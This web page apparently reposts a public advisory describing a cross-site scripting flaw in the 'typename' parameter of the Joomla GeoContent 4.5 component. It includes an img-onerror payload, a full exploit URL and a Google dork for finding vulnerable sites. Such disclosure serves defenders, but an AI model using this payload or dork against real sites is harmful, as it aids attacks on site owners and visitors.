Home / os / solaris

Joomla Component GeoContent 4.5 - Cross-site scripting

Posted on 30 November -0001

<HTML><HEAD><TITLE>Joomla Component GeoContent 4.5 - Cross-site scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: Joomla Component GeoContent 4.5 - Cross-site scripting # Date: 2017-02-13 # Home : https://extensions.joomla.org/extensions/extension/maps-a-weather/geotagging/geocontent/ # Exploit Author: Persian Hack Team # Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com) # Home : http://persian-team.ir/ # Telegram Channel AND Demo: @PersianHackTeam # Google Dork : inurl:index.php?option=com_geocontent # Tested on: Windows # POC : # typename Parameter Vulnerable to Cross-site scripting # Payload : <img src="1" onerror=alert('XSS')> # Exploit : http://www.Target.com/index.php?option=com_geocontent&task=layers.kml&typename=%3Cimg%20src=%221%22%20onerror=alert%28%27XSS%27%29%3E # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members # Iranian white hat Hackers </BODY></HTML>

 

TOP